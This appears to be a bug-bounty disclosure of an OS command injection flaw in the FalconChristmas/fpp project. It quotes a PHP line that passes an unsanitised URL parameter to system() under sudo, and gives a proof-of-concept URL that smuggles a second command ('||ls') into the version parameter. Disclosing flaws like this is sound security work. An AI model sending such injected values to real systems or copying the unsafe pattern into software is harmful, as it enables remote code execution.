OS Command Injection in FalconChristmas/fpp

Valid
Reported on May 12th 2021

✍️ Description

Hi, in https://github.com/FalconChristmas/fpp/blob/721c99aed6897792bf7f79fa02a280995e27d409/www/gitCheckoutVersion.php#L38 :

<?
system($SUDO . " $fppDir/scripts/git_checkout_version " . $_GET['version']);
?>

A system function is called with a user input, a malicious user could profit from it if the version variable contains a command

🕵️‍♂️ Proof of Concept

http://127.0.0.1/gitCheckoutVersion.php?version=a||ls

💥 Impact

Remote Code Execution